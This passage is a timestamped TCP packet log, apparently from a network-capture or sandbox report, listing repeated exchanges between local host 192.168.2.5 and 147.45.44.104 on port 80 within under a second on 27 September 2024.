Sep 27, 2024 00:16:19.460161924 CEST	49755	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:16:19.460199118 CEST	49755	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:16:19.460222960 CEST	49755	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:16:19.460644960 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:19.460690022 CEST	49755	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:16:19.460720062 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:19.460731030 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:19.460766077 CEST	49755	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:16:19.460797071 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:19.460808039 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:19.460849047 CEST	49755	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:16:19.461642027 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:19.461657047 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:19.461668015 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:19.461678028 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:19.461687088 CEST	49755	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:16:19.461689949 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:19.461720943 CEST	49755	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:16:19.461750984 CEST	49755	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:16:19.549993038 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:19.550009012 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:19.550019026 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:19.550097942 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:19.550107956 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:19.550120115 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:19.550179005 CEST	49755	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:16:19.550179005 CEST	49755	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:16:19.550179005 CEST	49755	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:16:19.550220966 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:19.550231934 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:19.550245047 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:19.550256014 CEST	49755	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:16:19.550257921 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:19.550263882 CEST	49755	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:16:19.550299883 CEST	49755	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:16:19.551027060 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:19.551053047 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:19.551064968 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:19.551074982 CEST	49755	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:16:19.551090002 CEST	49755	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:16:19.551106930 CEST	49755	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:16:19.551145077 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:19.551156044 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:19.551167011 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:19.551177025 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:19.551187992 CEST	49755	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:16:19.551213026 CEST	49755	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:16:19.551239014 CEST	49755	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:16:19.551841021 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:19.551851988 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:19.551862001 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:19.551887989 CEST	49755	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:16:19.551913977 CEST	49755	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:16:19.552382946 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:19.552395105 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:19.552406073 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:19.552417040 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:19.552428007 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:19.552428961 CEST	49755	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:16:19.552448034 CEST	49755	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:16:19.552472115 CEST	49755	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:16:19.552804947 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:19.552865982 CEST	49755	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:16:19.552875996 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:19.552887917 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:19.552918911 CEST	49755	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:16:19.552937984 CEST	49755	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:16:19.552942991 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:19.552953959 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:19.552963018 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:19.552973986 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:19.552983046 CEST	49755	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:16:19.552995920 CEST	49755	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:16:19.553008080 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:19.553025961 CEST	49755	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:16:19.553050995 CEST	49755	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:16:19.553966045 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:19.554009914 CEST	49755	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:16:19.640249014 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:19.640264034 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:19.640311003 CEST	49755	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:16:19.640332937 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:19.640340090 CEST	49755	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:16:19.640372992 CEST	49755	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:16:19.640381098 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:19.640392065 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:19.640423059 CEST	49755	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:16:19.640455961 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:19.640458107 CEST	49755	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:16:19.640466928 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:19.640496969 CEST	49755	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:16:19.640511036 CEST	49755	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:16:19.640567064 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:19.640607119 CEST	49755	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:16:19.640639067 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:19.640687943 CEST	49755	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:16:19.640723944 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:19.640733957 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:19.640760899 CEST	49755	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:16:19.640778065 CEST	49755	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:16:19.640798092 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:19.640822887 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:19.640835047 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:19.640840054 CEST	49755	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:16:19.640846014 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:19.640865088 CEST	49755	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:16:19.640885115 CEST	49755	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:16:19.641273022 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:19.641285896 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:19.641318083 CEST	49755	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:16:19.641346931 CEST	49755	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:16:19.641405106 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:19.641417980 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:19.641428947 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:19.641439915 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:19.641447067 CEST	49755	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:16:19.641450882 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:19.641473055 CEST	49755	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:16:19.641482115 CEST	49755	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:16:19.641516924 CEST	49755	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:16:19.641524076 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:19.641535044 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:19.641546965 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:19.641571045 CEST	49755	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:16:19.641581059 CEST	49755	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:16:19.642050982 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:19.642096996 CEST	49755	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:16:19.642193079 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:19.642205954 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:19.642218113 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:19.642227888 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:19.642236948 CEST	49755	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:16:19.642240047 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:19.642252922 CEST	49755	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:16:19.642287016 CEST	49755	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:16:19.642313957 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:19.642326117 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:19.642337084 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:19.642353058 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:19.642374992 CEST	49755	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:16:19.642374992 CEST	49755	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:16:19.642410040 CEST	49755	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:16:19.642414093 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:19.642457008 CEST	49755	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:16:19.642971992 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:19.642991066 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:19.643002033 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:19.643012047 CEST	49755	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:16:19.643030882 CEST	49755	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:16:19.643052101 CEST	49755	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:16:19.643091917 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:19.643104076 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:19.643115044 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:19.643126011 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:19.643135071 CEST	49755	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:16:19.643155098 CEST	49755	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:16:19.643171072 CEST	49755	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:16:19.643208027 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:19.643218994 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:19.643229961 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:19.643241882 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:19.643251896 CEST	49755	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:16:19.643282890 CEST	49755	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:16:19.643942118 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:19.643953085 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:19.643965006 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:19.643990040 CEST	49755	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:16:19.644021988 CEST	49755	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:16:19.644062996 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:19.644073009 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:19.644083977 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:19.644094944 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:19.644105911 CEST	49755	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:16:19.644135952 CEST	49755	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:16:19.644177914 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:19.644193888 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:19.644203901 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:19.644215107 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:19.644218922 CEST	49755	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:16:19.644251108 CEST	49755	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:16:19.644824982 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:19.644870043 CEST	49755	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:16:19.733736038 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:19.733783960 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:19.733795881 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:19.733833075 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:19.733843088 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:19.733841896 CEST	49755	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:16:19.733860016 CEST	49755	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:16:19.733875990 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:19.733903885 CEST	49755	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:16:19.733923912 CEST	49755	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:16:19.734016895 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:19.734028101 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:19.734038115 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:19.734050035 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:19.734055996 CEST	49755	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:16:19.734061003 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:19.734067917 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:19.734069109 CEST	49755	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:16:19.734098911 CEST	49755	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:16:19.734116077 CEST	49755	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:16:19.734251976 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:19.734263897 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:19.734297037 CEST	49755	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:16:19.734324932 CEST	49755	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:16:19.734347105 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:19.734388113 CEST	49755	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:16:19.734467030 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:19.734476089 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:19.734504938 CEST	49755	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:16:19.734524012 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:19.734524965 CEST	49755	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:16:19.734535933 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:19.734545946 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:19.734569073 CEST	49755	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:16:19.734580994 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:19.734595060 CEST	49755	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:16:19.734623909 CEST	49755	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:16:19.734644890 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:19.734657049 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:19.734685898 CEST	49755	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:16:19.734703064 CEST	49755	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:16:19.734730959 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:19.734743118 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:19.734752893 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:19.734764099 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:19.734774113 CEST	49755	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:16:19.734791040 CEST	49755	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:16:19.734819889 CEST	49755	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:16:19.734991074 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:19.735001087 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:19.735016108 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:19.735024929 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:19.735028982 CEST	49755	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:16:19.735053062 CEST	49755	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:16:19.735073090 CEST	49755	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:16:19.735147953 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:19.735187054 CEST	49755	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:16:19.735261917 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:19.735272884 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:19.735307932 CEST	49755	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:16:19.735316992 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:19.735327959 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:19.735337973 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:19.735348940 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:19.735357046 CEST	49755	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:16:19.735400915 CEST	49755	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:16:19.735410929 CEST	49755	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:16:19.735605955 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:19.735616922 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:19.735629082 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:19.735640049 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:19.735650063 CEST	49755	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:16:19.735650063 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:19.735661030 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:19.735671043 CEST	49755	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:16:19.735672951 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:19.735683918 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:19.735696077 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:19.735703945 CEST	49755	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:16:19.735717058 CEST	49755	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:16:19.735747099 CEST	49755	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:16:19.735944033 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:19.735955954 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:19.735989094 CEST	49755	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:16:19.736010075 CEST	49755	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:16:19.736151934 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:19.736191034 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:19.736191034 CEST	49755	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:16:19.736202955 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:19.736232996 CEST	49755	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:16:19.736243010 CEST	49755	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:16:19.736323118 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:19.736335039 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:19.736345053 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:19.736363888 CEST	49755	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:16:19.736388922 CEST	49755	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:16:19.736459970 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:19.736470938 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:19.736480951 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:19.736493111 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:19.736504078 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:19.736509085 CEST	49755	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:16:19.736515999 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:19.736536026 CEST	49755	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:16:19.736550093 CEST	49755	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:16:19.736722946 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:19.736742020 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:19.736752033 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:19.736763000 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:19.736768961 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:19.736776114 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:19.736783981 CEST	49755	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:16:19.736816883 CEST	49755	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:16:19.737163067 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:19.737173080 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:19.737185001 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:19.737205982 CEST	49755	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:16:19.737236023 CEST	49755	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:16:19.737262011 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:19.737272978 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:19.737283945 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:19.737294912 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:19.737307072 CEST	49755	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:16:19.737327099 CEST	49755	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:16:19.737353086 CEST	49755	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:16:19.737478971 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:19.737492085 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:19.737503052 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:19.737523079 CEST	49755	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:16:19.737535000 CEST	49755	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:16:19.737544060 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:19.737555027 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:19.737555981 CEST	49755	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:16:19.737581968 CEST	49755	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:16:19.737601995 CEST	49755	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:16:19.737652063 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:19.737680912 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:19.737692118 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:19.737693071 CEST	49755	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:16:19.737701893 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:19.737713099 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:19.737720013 CEST	49755	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:16:19.737723112 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:19.737740993 CEST	49755	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:16:19.737759113 CEST	49755	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:16:19.737787962 CEST	49755	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:16:19.738075018 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:19.738118887 CEST	49755	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:16:19.738122940 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:19.738135099 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:19.738167048 CEST	49755	80	192.168.2.5	147.45.44.104
